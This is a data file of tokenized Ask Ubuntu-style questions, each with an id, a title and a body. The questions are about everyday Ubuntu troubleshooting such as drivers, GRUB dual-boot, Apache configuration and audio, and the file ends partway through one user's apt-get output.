222676	help with persistence and syslinux file	i 'm currently trying to add persistence to my lubuntu 12.04 operating system which i am running on 'try before you install ' on a usb drive . my computer has no hard drive so this is the only option . the instructions for adding persistence ( http : //unetbootin.sourceforge.net/diskimg/readme.txt ) tell me to edit the syslinux.cfg file , but i can not see it here , meaning i ca n't do what i want to do . where do i find it guys ? thanks , ubunturob .
222679	why am i getting this error when trying to add a new site in apache ?	i 'm trying to do some php work , and decided to install lamp . i 've followed the instructions on the following site here to install , and also add an extra site ( using /var/wwww and having to gksu nautilus files seemed pointless ) so i followed the instructions here under `` virtual hosts '' . however , i completed the instructions and when i try and restart apache i get the following message : dan @ inn0min4t3 : ~ $ sudo /etc/init.d/apache2 restart syntax error on line 4 of /etc/apache2/sites-enabled/mysite : documentroot takes one argument , root directory of the document tree action 'configtest ' failed . the apache error log may have more information . ... fail ! and this is my mysite config : < virtualhost *:80 > serveradmin webmaster @ localhost documentroot /home/dan/documents/website design/helheimr < directory / > options followsymlinks allowoverride none < /directory > < directory /home/dan/documents/website design/helheimr/ > options indexes followsymlinks multiviews allowoverride none order allow , deny allow from all < /directory > scriptalias /cgi-bin/ /usr/lib/cgi-bin/ < directory `` /usr/lib/cgi-bin '' > allowoverride none options +execcgi -multiviews +symlinksifownermatch order allow , deny allow from all < /directory > errorlog $ { apache_log_dir } /error.log # possible values include : debug , info , notice , warn , error , crit , # alert , emerg . loglevel warn customlog $ { apache_log_dir } /access.log combined < /virtualhost > sorry if it 's obvious . i spent a while looking on google and i could n't find much , i did read that i might need to remove the '/ ' at the end , and i tried that but i had the same result . thank you .
222683	how to change chromiums windows buttons to gnome defaults ?	chromium 's custom minimise/maximise/close buttons do not fit in with my gnome 3 theme . i have managed to move them back to the right hand side , but i can not find a way to change the button icons to those set up in my theme , is this possible ? http : //i.imgur.com/suh7w.png here is a screenshot of chromium ( left ) next to firefox ( right ) for reference as to what im trying to achieve . i want to make chromium 's minimise/maximise/close buttons more consistent with my gnome 3 theme , such as they are on the firefox window . can anyone help me out here ?
222686	how do i get a brother dcp-145c printer working ?	ubuntu 12.10 is refusing to acknowledge printer or the old drivers from brother . been having this problem for the last few upgrades . ca n't afford to keep upgrading devices .
222692	irc in empathy on 12.10	i opened empathy , go to accounts ( f4 ) , it takes me to `` online accounts '' where i can choose between many account types , but there is no irc . there is face , google , twitter ... .but no irc . am i missing something ?
222694	how to display text on pc startup before booting ubuntu	i am new to ubuntu and i am using ubuntu 12.04 . i want to know about the boot file of ubuntu . like in windows we have a boot.ini file , there must be a similar file in ubuntu which would boot it . i want to know which file is it and how to edit that file in such a way that when i power on my pc it would first display a text which i want to show and then boot ubuntu . can this be done ?
222695	ubuntu 12.10 amd eyefinity	i 'm a linux n00b , but i 'm trying to learn ubuntu 12.10 , is there a way to make a single top panel when using eyefinity with 3 monitors ? i would have posted a screenshot , but i was prevented because i do n't have a reputation of 10 yet . but at this time i got three top panels , one on each of my three monitors ...
222696	download flashplugin-installer error	i 'm getting this error constantly : failure to download extra data files the following packages requested additional data downloads after package installation , but the data could not be downloaded or could not be processed . flashplugin-installer the download will be attempted again later , or you can try the download again now . running this command requires an active internet connection . i 've tried purging my existing flashplugin , reinstalling it using `` sudo apt-get install flashplugin-nonfree '' , tried installing the firefox flash plugin from the software center , and nothing appears to work . currently running lubuntu 12.10 .
222697	unable to change brightness on a toshiba m505	i got toshiba m505 and i ca n't change the brightness of my screen . i can see the brightness adjusting bar move when i use fn+f6 or fn+f7 keys but nothing happens . i 'm using ubuntu 12.04 . i did a lot of search on-line but i ca n't find anything clear for me to understand .
222699	i do n't understand the error displayed when i run the '' sudo apt-instal '' l command ?	i am very new to ubuntu and when i try to install emacs it shows error : i am running ubuntu in virtual box.the error is shown below talha @ talha-virtualbox : :~ $ sudo apt-get install emacs23 reading package lists ... done building dependancy tree reading state information ... done e : unable to locate package emacs23 how to correct the problem ?
222701	how to set up canon lbp3000 shared from windows 7 ?	ok , so i 've got canon lbp3000 attached to my htpc/home server running windows 7 x64 . it 's shared over the network and other windows pcs can access it and use it without any problems . recently , i 've installed ubuntu 12.04 lts 64-bit on my main work pc ( it 's a toshiba tecra laptop ) , and i 'm mostly happy with how things are going , but i 've got absolutely no idea how to set up my printer . i 've searched and found some solutions ( mostly for 32-bit unfortunately ) , but none of them are detailed enough and/or i do n't have enough knowledge to pick the important bits and figure out the rest . i 've downloaded the drivers from canon website . please , someone , step by step , what should i do next ?
222704	install paraller printer	i have an hp printer deskjet 710c . i have tried to connect him to ubuntu 12.10 but when i click add in printers it gives me a host . does it mean the driver ? if so where can i get the driver for my printer ?
222706	how do i set a program as a ubuntu screensaver ?	i have made a program for a moving ball using open gl , how do i set it as a ubuntu screen saver ?
222711	menus and text boxes look graphically corrupted in 12.10	if i let my computer run long enough the screen gets glitchy or graphically corrupted only in certain areas i.e . in text related boxes , menus , menu bars , scroll bars , the system monitor window , etc . it becomes difficult to read what i am typing . its been happening quite often and i can only fix it by restarting the computer , but its only a matter of time before it happens again . do n't know what else to do , its been a thorn in my side for quite some time now and i need a fix soon because its only gets more frequent until i 'm rebooting my computer five times a day . i attached a picture of what happens to this bug report : https : //bugs.launchpad.net/ubuntu/+source/xorg/+bug/1083474 i know i can repeat this bug but i do n't know how to catch it and document it . any help would be greatly appreciated . thank you
222712	need help video card issue	how can i fix the problem with the image ? if you look at the top-left of : text and some images starts flickering . i have 2 nvidia gtx460 . drivers are `` unknown '' according to `` about this computer '' at the top right . i 've just installed ubuntu 12.10 .
222714	is it possible to use dd to obtain splited images from a hard-drive ?	my piano teacher asked me to record one of his recitals with his ipod ( 3-4 generation , not so sure ) and i did it . while trying to edit it , he accidentaly deleted it , i 'm trying to recover . after some research , i 've been able to discover that there 's a way to recover it and i 've been able to make it work but the ipod had 64 gb and doing it through ssh is deadly slow , in the last two days , the process stopped twice with this error : root @ g1 : /home/gustav # ssh root @ 192.168.1.101 dd if=/dev/rdisk0s2s1 bs=1m | dd of=iphone-use2.img root @ 192.168.1.101 's password : write failed : broken pipe 4113088+0 records in 4113088+0 records out 2105901056 bytes ( 2.1 gb ) copied , 51107.2 s , 41.2 kb/s i believe the probability of this process stoping in the middle is a high , mainly because it 's a dd on 64gb through ssh ( it seems it 's going to take 6-7 days ) then i thought about copying little pieces of the ipod 's disk at a time and merge them after the process is complete . since the beginning , i noticed that the process through ssh is slow , then i have two questions : is it possible to make these splitted images from the ipod 's hard drive using dd ? would it be possible to use something else ( such as ftp or anything faster than ssh ) in order to achieve this ? the title of the question have only one of this questions for the following reason : `` i 've been able to make it work through ssh , having to wait is not really a problem - the processing stopping all the time is the problem , splitting the image is the objective , but you could also help me to find something that would work a little faster . '' also for the ones who suggest : `` why do n't you just plug the ipod in and mount it 's disk ? '' - the answer is : with the small research i did until now , it seems to be impossible , the only viable way i found to do it is with dd + ssh . 3 : i 've read here that there 's a block size , is this related somehow ?
222715	how to keep a package with unmet dependencies ?	( this is linux mint 14 , but i think it 's still relevant here ) i 've installed gnapi package from deb file . it had one dependency which was n't met ( libnautilus-extension1 ) , but i forced installation and everything works fine . but now when i want to install skype deb ( or just launch synaptic ) , it displays message that system is broken . trying to fix it the reccomended way : sudo apt-get install -f would result in removing gnapi , which is working fine ( and i need it ) . how can i fix the broken state , but keep the package ?
222720	what 's the meaning of : /dev/rdisk0s1 and /dev/rdisk0s2s1 ?	i 'm trying to use ssh to make a disk image by using dd on an ipod . and i 'm using this commands : ssh root @ 192.168.1.100 dd if=/dev/rdisk0s1 bs=1m | dd of=iphone-root.img ssh root @ 192.168.1.100 dd if=/dev/rdisk0s2s1 bs=1m | dd of=iphone-user.img what 's the meaning of : /dev/rdisk0s1 and /dev/rdisk0s2s1 ? it seems they 're references to places in the disk , how can i know how many places are in this disk ?
222722	how to see how much memory/cpu unity is using	i am trying to see how much memory and cpu the whole unity desktop is using . for this i tried looking at the unity process but since it is divided in many parts it became difficult . i want to see how much unity as a whole , is consuming in memory ( and/or cpu ) . is there a parameter to see this , a script to read all unity components and sum them up . optionally including all dependent packages of unity like compiz .
222724	wireless tp-link does n't work	i have ubuntu 12.10 . i have cabled in my tp link wi-fi usb adpter but it does n't work . can anyone tell me where can i find drivers for linux ? my model is tl-wn722n at 150 mb/s .
222730	help with dual boot , multi boot windows 8 and ubuntu	i am using a netbook preloaded with windows 7 starter . this worked fine . then , in installed ubuntu 10.4 and for a while , i could use both ubuntu and windows as grub was automatically loaded with ubuntu installation . i could choose which system os to use upon load up . then , one day , windows disappeared and i could not recover windows , so i have been using ubuntu 10.0.4 on this system for about 2 years . subsequently , ubuntu 10.0.4 froze too many times , so i partitioned and installed ubuntu 12.0.1 . once again , grub 2 was automatically installed , and i could choose between ubuntu 10 and 12 each boot up . this was fine but i never recovered my windows documents from the disappeared windows 7 os . so recently , i installed windows 8 on a separate partition ( about 20 gb ) , and set up a storage fat 32 partition ( for storage of files , both ubuntu and windows ) so i do n't have to reboot using the same files from different systems . windows loaded fine , and detected this partition . windows as c : and the partition as d : however , both my ubuntus went missing . then , i set up ubuntu studio 12.0.1 on my usb stick and using the terminal , i managed to run boot-repair . ubuntu studio shows my ubuntu 10.4.0 drive as existent but ubuntu 12 is not detected , with all the files missing . in place of the ubuntu 12 drive , it now only shows unallocated space . question : how can i reactivate both ubuntu 12 , the old windows 7 , windows 8 , on a multi-boot strategy so that i can choose from different os each time i reboot , with grub loader showing and letting me choose ? ? upon reboot , my netbook shows no os found , and the only way i can even work the computer is to use the usb live ubuntu studio 12 . but i ca n't get the netbook to multi-boot on its own any of the system and all my files are frozen ! ! can someone help me ? i have been surfing the web for days and spent 3 days and nights figuring this out and my neck is sprained and hurts . how can i access my files ? if this is not possible , i just want my ubuntu back and not windows 8 cos the problem seems to have started when i installed windows 8 , and i do n't have files on that system os , so i can afford to delete that . ideally , i would like to be able to multi boot all three systems from grub loader , but that does n't seem to work . each time i reinstall grub , it only shows the previous sessions of ubuntu 10.0.1 . all the rest are not detectable . please help . this is what my fdisk -l shows ubuntu-studio @ ubuntu-studio : ~ $ sudo fdisk -l disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00072a92 device boot start end blocks id system /dev/sda1 * 2048 156934143 78466048 83 linux /dev/sda2 156934144 283422719 63244288 b w95 fat32 /dev/sda3 283422720 325584895 21081088 7 hpfs/ntfs/exfat /dev/sda4 325586942 625141759 149777409 5 extended /dev/sda5 619190272 625141759 2975744 82 linux swap / solaris disk /dev/sdb : 4007 mb , 4007657472 bytes 61 heads , 21 sectors/track , 6110 cylinders , total 7827456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x0009e302 device boot start end blocks id system /dev/sdb1 * 63 7827455 3913696+ b w95 fat32
222731	dsl modem drops connection intermittently	i have a dual-boot machine : windows 7 and ubuntu 10.04 . the computer is connected directly to the baudtec modem by a lan cable . the modem is connected to the phone jack . under windows , the internet works without any problems . under ubuntu , i set up by using pppoeconf and can get online without a problem . however , after some time ( about 15-20 minutes , sometimes less ) , the internet stops working . that is , i can not open any website . i can still `` ping 8.8.8.8 '' , although `` ping www.google.com '' says `` unknown host '' . also , if i have gmail open in the browser , it may continue to work for some time , though i can not load any other site . also , my isp continues to see me online , so there is no problem from their point of view . the following commands do not help to restore the full connection : pkill -9 pppd pon dsl-provider however , they do help after powering off the modem , waiting for a little while and turning it back on again . i exchanged the modem ( baudec is the current one ) , but the problem persisted . please let me know what information i may provide to help diagnose the problem . i will very much appreciate your help . meir update : thanks to the first reply , i found a much easier way to restore connection after a crash . namely , i noticed that after doing `` ping 8.8.8.8 '' , i can ping my provider ( i.e . the ips in the /etc/resolv.conf before the crash ) as well . so , i just do `` ping 8.8.8.8 '' and restore /etc/resolv.conf from a backup copy and the internet works again ! i do not even have to restart pppd . after some 20 minutes the problem repeats itself ...
222736	wireless does n't work in 12.10	i have ubuntu 12.10 . i have cabled in my tp link wi-fi usb adpter but it does n't work . can anyone tell me where can i find drivers for linux ? my model is tl-wn722n at 150 mb/s .
222739	video file to .ogg	ok so i have raw video file and a audio track that i want to put in container , as far as i know .ogg is an container format so i want to know if there is a way to put my media files in this container format like i can do this with .mkv format with this tool i do not want to encode this video i just want to place my media files in container format and i want to try and use .ogg format for this task thank you in advanced
222740	ubuntu one error at startup ipcerr	when i try to start up ubuntu one , i get an error pop-up that says that ubuntu needs to close . the details just say `` ipcerr '' . i am running on ubuntu 12.04.1 .
222742	windows 8 best practices on ubuntu 12.10 with virtualbox 4.2.4	i 've installed windows 8 on virtualbox 4.2.4 / ubuntu 12.10 . the virtual display graphics is n't fast enough , for example video on youtube ( 360/480p ) is running with low frame rate . already installed guest additions and checked the 2d video acceleration . with or without this feature , i get desktop graphics performance of 2.2 ... which is very low , compares to 3d business and gaming graphics performance that has a score of 4.0. i would expect the 3d graphics score to be lower than the desktop/2d graphics score . is there any best practices that i can do in order to improve 2d performance ?
222743	installed windows 7 , then ubuntu . cant boot windows 7 , although option appears in grub menu ?	basically installed windows 7 , followed by ubuntu installation . option to boot windows appears in grub menu , but when i select it and hit enter i get redirected back to same grub menu ? what could possibly be wrong ?
222745	sudo apt-get update error ubuntu 12.04	hi i 'm new in linux and i need your help : ) every time when i type sudo apt-get update it shows : alphaog @ alphaog-hp-pavilion-dv7 : ~ $ sudo apt-get update e : type 'ain ' is not known on line 3 in source list /etc/apt/sources.list.d/ricotz-testing-precise.list e : the list of sources could not be read . i tried gksu gedit /etc/apt/sources.list and put # in front third line but it still does n't work . please help ! : )
222757	vmware file transfer	what i am trying to do is download files from windows 7 on vmware to host , which is ubuntu . i want to know is there anyway i can do this without ftp ? i tried enable file sharing with vmware but it would only allow me to share from host to guest not from guest to host . i need a little help please .
222761	12.10 unexpected shutdown	a week ago i upgraded my system from 12.04 to 12.10 and now i am experiencing unexpected shutdowns . i did not have this problem at 12.04 . this happened twice in a week and it takes a while to load my user settings when i re-open the system after unexpected shutdown . do you have an idea what can be the reason for this situation ? is there a log-file which i can see the reason of the shutdown like overheating or xx application crash etc ? regards note : at the second time , i was only watching a video on youtube by chromium , no other programs were running . ( only everypad and dropbox were running in the background ) at the first time i was coding matlab and again chromium was open and listening to music on youtube . i do not know if something related to flash player can be a clue ?
222762	slow graphics on external monitor with ubuntu 12.10 on macbook pro 8,3 ?	i have a 17-in macbook pro , running snowleopard and ubuntu 12.10 . ubuntu runs fine , except when i connect it to and external monitor . it exhibits a considerable lag in graphics acceleration . i.e . when minimizing windows using ( super key / command + w ) ; relevant info product name by executing sudo dmidecode -s system-product-name is macbookpro8,3 graphic card and other hardware info by exectuting lspci gives vga compatible controller : advanced micro devices [ amd ] nee ati whistler [ amd radeon hd 6600m series ] i have searched on forums , exprimented with propritery drivers ( which did not work at all ) but nothing seems to enhance it . also , i did not experience this on my desktop . i am hoping someone has already found a solution .
222764	ubuntu 10.2 to ubuntu 12.04 lts migration with mdadm ( software raid )	i am very hesitant to push the `` upgrade '' button that i see in my software updates program . the reason for this is the fact that my server is configured as backup server with software raid . is there any way to make this move save ? i have read a couple of questions here which did not sound very encouraging . is there any way to do this save ? thanks pf
222765	ubuntu 12.10 skype webcam microphone not working	this is making me crazy . after upgrading to ubuntu 12.10 , skype 4.1.0.20 ca n't use my web cam microphone anymore . i can record correctly from the web cam microphone using the sound recorder the web cam microphone is selected in the global sound settings and working in any other application . also tried to start skype with ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l1compat.so /usr/bin/skype and ld_preload=/usr/lib/i386-linux-gnu/libv4l/v4l2convert.so /usr/bin/skype no matter what , skype will keep using the front panel microphone for audio capture . mic was working fine with ubuntu 12.04 before i upgraded to 12.10 .
222768	how can i log into or out of a lubuntu guest account ?	i discovered i had a guest user account logged in when i tried to shut down and lubuntu told me i could n't . when i try to switch users from my administrator account to the guest account i am asked for a password . my friend , who had logged in as a guest , claims he did not create a password . ideally i 'd like someone will tell me how to get into this guest account , but i will be satisfied if all i get is advice on the best way to shutdown and eliminate the guest account . thanks !
222771	how to make webcam settings permanent ?	with the built-in webcam of my samsung np535u3c i have the common problem of the picture looking too dark . i can easily adjust the settings of brightness , contrast , etc . using guvcview , but i ca n't avoid repeating this operation every time i start a new session . i 've noticed that guvcview allows me to save the settings in a *.gpfl file . my question is : is there a way to make these settings permanent ? or alternatively , how can i make a script that loads these settings at startup ? the content of my webcam_settings.gpfl is as follows : # v4l2/ctrl/0.0.2 app { `` guvcview 1.5.3 '' } # control data # brightness id { 0x00980900 } ; chk { 0:255:1:135 } =val { 186 } # contrast id { 0x00980901 } ; chk { 0:255:1:33 } =val { 47 } # saturation id { 0x00980902 } ; chk { 0:255:1:40 } =val { 69 } # hue id { 0x00980903 } ; chk { -180:180:1:0 } =val { 0 } # gamma id { 0x00980910 } ; chk { 90:150:1:128 } =val { 150 } # power line frequency id { 0x00980918 } ; chk { 0:2:1:2 } =val { 2 } # sharpness id { 0x0098091b } ; chk { 0:128:1:80 } =val { 80 } # backlight compensation id { 0x0098091c } ; chk { 0:1:1:0 } =val { 0 } # exposure , auto priority id { 0x009a0903 } ; chk { 0:1:1:0 } =val { 0 }
222775	wireless speed problem with 12.04	i have a dell inspiron n5050 laptop with windows 7 and ubuntu 12.04lts os 's . i also have just moved to bt infinity option 1 broadband which i connect to using wireless . when i run windows 7 with ie and carry out a broadband speed check it consistently returns 37mb download . however when i run ubuntu with firefox i 'm lucky if i get 7mb . i would be very grateful for any advice to help me overcome this problem as i really do n't like windows .
222779	can not boot into windows 7	i can not boot into windows 7 after trying to dual boot . here 's my bootinfo summary from boot-repair : http : //paste.ubuntu.com/1392920 i 'd appreciate some help in trying to get back into windows . thanks !
222787	jack audio ubuntu 12.10	i used to have jack server working with 10.10 , 11.04 , 11.10 but not 12.04 and now 12.10 . i have installed jackd jackd2 qjackctl surfed many forums and even given advice of how to get jack working , but now i am stuck . tue nov 27 22:30:46 2012 : saving settings to `` /home/shane/.config/jack/conf.xml '' ... 22:31:19.960 d-bus : jack server could not be started . sorry can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started tue nov 27 22:31:19 2012 : starting jack server ... tue nov 27 22:31:19 2012 : jack server starting in realtime mode with priority 10 tue nov 27 22:31:19 2012 : [ 1m [ 31merror : can not register object path `` /org/freedesktop/reservedevice1/audio0 '' : a handler is already registered for /org/freedesktop/reservedevice1/audio0 [ 0m tue nov 27 22:31:19 2012 : [ 1m [ 31merror : failed to acquire device name : audio0 error : a handler is already registered for /org/freedesktop/reservedevice1/audio0 [ 0m tue nov 27 22:31:19 2012 : [ 1m [ 31merror : audio device hw:0,0 can not be acquired ... [ 0m tue nov 27 22:31:19 2012 : [ 1m [ 31merror : can not initialize driver [ 0m tue nov 27 22:31:19 2012 : [ 1m [ 31merror : jackserver : :open failed with -1 [ 0m tue nov 27 22:31:19 2012 : [ 1m [ 31merror : failed to open server [ 0m tue nov 27 22:31:21 2012 : saving settings to `` /home/shane/.config/jack/conf.xml '' ... 22:31:22.047 could not connect to jack server as client . - overall operation failed . - unable to connect to server . please check the messages window for more info . can not connect to server socket err = no such file or directory can not connect to server request channel jack server is not running or can not be started can anyone assist ?
222792	error : hd0 out of disk grub rescue >	i restarted my laptop after my chromium started to freeze , and this popped up when it turned back on . can someone help me ? still new to ubuntu and i know nothing about coding and programming .
222797	grubx64.efi can not find grub config or grub files , boots to grub console	sony vaio with insyde h2o efi bios will not boot into grub efi the answer to this question was immensely helpful to me and my new vaio z3 . the issue that i am having now is that after replacing bootmgfw.efi with grubx64.efi and renaming , it boots directly to grub console . i dont even get a menu where i can chose ubuntu . i tried putting a grub.cfg file next to the new bootmgfw.efi ( grubx64.efi ) , no go ? any ideas how i can get the renamed grubx64.efi to find all the rest of the grub stuff outside of the esp in my linux parition ? or do i have to move all grub files to /efi/microsoft/boot on esp ? thank you !
222798	battery life-time on acer aspire timeline-x 4830tg	i 'm running 12.04 . in windows my pc lasts approximately 7-8 hours but in ubuntu it seems like 2-3 hours . battery time is paramount for me , so how can i fix that ? ubuntu 12.04 i5 2450 intel hd-300 & nvidia gt540m
222799	no ethernet or wireless interfaces on 10.04	so , i just got a new lenovo thinkpad t430s and installed lucid 10.04 on it . the installation went fine but when i logged in there was no connection to the internet even with a cord plugged in . ifconfig shows that i dont have any interfaces other than lo . i think what i need to do is update my kernel version ( 2.6.32 as of now ) . if anyone could help me out that would be amazing . thanks ! thanks for your help ! here is the code for lspci -nn : 00:00.0 host bridge [ 0600 ] : intel corporation device [ 8086:0154 ] ( rev 09 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation device [ 8086:0166 ] ( rev 09 ) 00:14.0 usb controller [ 0c03 ] : intel corporation device [ 8086:1e31 ] ( rev 04 ) 00:16.0 communication controller [ 0780 ] : intel corporation device [ 8086:1e3a ] ( rev 04 ) 00:16.3 serial controller [ 0700 ] : intel corporation device [ 8086:1e3d ] ( rev 04 ) 00:19.0 ethernet controller [ 0200 ] : intel corporation device [ 8086:1502 ] ( rev 04 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation device [ 8086:1e2d ] ( rev 04 ) 00:1b.0 audio device [ 0403 ] : intel corporation device [ 8086:1e20 ] ( rev 04 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation device [ 8086:1e10 ] ( rev c4 ) 00:1c.1 pci bridge [ 0604 ] : intel corporation device [ 8086:1e12 ] ( rev c4 ) 00:1c.2 pci bridge [ 0604 ] : intel corporation device [ 8086:1e14 ] ( rev c4 ) 00:1c.4 pci bridge [ 0604 ] : intel corporation device [ 8086:1e18 ] ( rev c4 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation device [ 8086:1e26 ] ( rev 04 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation device [ 8086:1e55 ] ( rev 04 ) 00:1f.2 sata controller [ 0106 ] : intel corporation device [ 8086:1e03 ] ( rev 04 ) 00:1f.3 smbus [ 0c05 ] : intel corporation device [ 8086:1e22 ] ( rev 04 ) 03:00.0 network controller [ 0280 ] : intel corporation device [ 8086:0085 ] ( rev 34 ) 04:00.0 system peripheral [ 0880 ] : ricoh co ltd device [ 1180 : e823 ] ( rev 04 )
222801	brightness control not working- ubuntu 12.04 lts - macbook pro 5,5	i am new to ubuntu and recently installed it on my mac . i have ran all of the update i.e . : ( apt-get update ) , and have as well installed the proprietary nvidia driver ( nvidia-current-updates ) . after having installed that driver , the brightness control stopped working ( which seems to be rather common ) . i have tried to tackle this issue for a while now , but have been unable to fix it . i have followed the instructions in this post but to no avail : brightness controls does n't work on a macbook pro 5.5 ( ubuntu 12.04 lts ) when i run this command : lspci -v | grep -i -a 15 vga this is what i get : capabilities : < access denied > kernel driver in use : nvidia kernel modules : nvidia_current_updates , nouveau , nvidiafb i have created and modified the xorg.conf file , and have added the lines mentioned in the other post , i have restarted the computer and pressed f1 and f2 but the brightness of the screen wo n't budge . any ideas what else i could do to solve this problem ? thank you in advance for any suggestions ! edit : i have also tried all 6 steps in this link : https : //help.ubuntu.com/community/macbookpro5-5/precise # lcd_brightness_control as well as https : //help.ubuntu.com/community/macbookpro5-5/precise # keyboard ( for the keyboard keys )
222803	how do i run an application once installed ?	i have just downloaded three programs , including audacity from the software center , and , while they are listed in my 'downloads ' folder , i do n't see how to open and run them . when i write click `` open '' , all i get is read-only files like `` .exe . '' the software center also says `` installed '' . no icon has appeared for audacity . suggestions ? thanks .
222804	is there an android remote app compatible with libreoffice impress under ubuntu ?	i have an upcoming presentation i want to make in libreoffice impress on my ubuntu 12.10 laptop . i was wondering if i could get ahold of an android app which would act like a remote control , allowing me to switch between slides from my phone over wifi without having to stay near the laptop ( i 've been told i need to move around more during my presentations ) . a quick look on the google play store seemed to turn up a handful of powerpoint remote apps for windows or maybe mac . i also took a look at can an android phone control ubuntu like a remote ? , but that seems more for controlling an ubuntu media center . is there anything which will work with libreoffice impress on ubuntu ? my phone is a samsung galaxy precedent on straight talk , running android 2.2.2 ( latest available version from the carrier ) . it 's not rooted , and there 's not much memory on it either , so the smaller and simpler the app the better . also , it has to be free because i currently do n't have a means to pay for an app i may/may not like .
222807	what artificial life games are available for ubuntu ?	i am something of a fan of artificial life / evolution simulation games . what games of this genre are available for ubuntu ? preferably it should be something fairly complex yet user-friendly ; note that i 'm not talking about game of life clones ( too rigid for my taste ) .
222808	never get kernel newer than 2.6.32-42	after research no related answer to adapt to my problem was found . i have 2 laptops and a pc that run lucid . laptops now were updated to 2.6.32-45 but the pc stays at 2.6.32-42 while other software are updated as usual . i think there must be something wrong in the pc but my ability to dig that out is very limited . how can i make the pc to get newer kernel updated as do the laptops ? wijit @ aeh : ~ $ sudo apt-get update & & sudo apt-get dist-upgrade [ sudo ] password for wijit : ign cdrom : //ubuntu 10.04.2 lts _lucid lynx_ - release i386 ( 20110211.1 ) lucid release.gpg ign cdrom : //ubuntu 10.04.2 lts _lucid lynx_ - release i386 ( 20110211.1 ) / lucid/main translation-en_us ign cdrom : //ubuntu 10.04.2 lts _lucid lynx_ - release i386 ( 20110211.1 ) / lucid/restricted translation-en_us hit http : //ubuntu-archive.sit.kmutt.ac.th lucid release.gpg ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid/main translation-en_us hit http : //dl.google.com stable release.gpg ign http : //dl.google.com/linux/earth/deb/ stable/main translation-en_us ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid/restricted translation-en_us hit http : //dl.google.com stable release ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid/universe translation-en_us ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid/multiverse translation-en_us hit http : //dl.google.com stable/main packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates release.gpg get:1 http : //linux.dropbox.com lucid release.gpg [ 489b ] ign http : //linux.dropbox.com/ubuntu/ lucid/main translation-en_us ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/main translation-en_us ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/restricted translation-en_us hit http : //archive.canonical.com lucid release.gpg ign http : //archive.canonical.com/ubuntu/ lucid/partner translation-en_us ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/universe translation-en_us hit http : //ppa.launchpad.net lucid release.gpg ign http : //ppa.launchpad.net/tualatrix/ppa/ubuntu/ lucid/main translation-en_us hit http : //packages.medibuntu.org lucid release.gpg get:2 http : //linux.dropbox.com lucid release [ 2,599b ] ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-updates/multiverse translation-en_us hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security release.gpg ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-security/main translation-en_us ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-security/restricted translation-en_us hit http : //archive.canonical.com lucid release get:3 http : //linux.dropbox.com lucid/main packages [ 1,029b ] ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-security/universe translation-en_us hit http : //ppa.launchpad.net lucid release ign http : //ubuntu-archive.sit.kmutt.ac.th/ lucid-security/multiverse translation-en_us hit http : //ubuntu-archive.sit.kmutt.ac.th lucid release hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates release hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security release hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/main packages hit http : //archive.canonical.com lucid/partner packages ign http : //packages.medibuntu.org/ lucid/free translation-en_us hit http : //ppa.launchpad.net lucid/main packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/restricted packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/main sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/restricted sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/universe packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/universe sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/multiverse packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid/multiverse sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/main packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/restricted packages ign http : //packages.medibuntu.org/ lucid/non-free translation-en_us hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/main sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/restricted sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/universe packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/universe sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/multiverse packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-updates/multiverse sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/main packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/restricted packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/main sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/restricted sources hit http : //packages.medibuntu.org lucid release hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/universe packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/universe sources hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/multiverse packages hit http : //ubuntu-archive.sit.kmutt.ac.th lucid-security/multiverse sources hit http : //packages.medibuntu.org lucid/free packages hit http : //packages.medibuntu.org lucid/non-free packages fetched 4,117b in 4s ( 827b/s ) reading package lists ... done reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done the following packages will be upgraded : libc-bin libc-dev-bin libc6 libc6-dev libc6-i686 vim-common vim-tiny 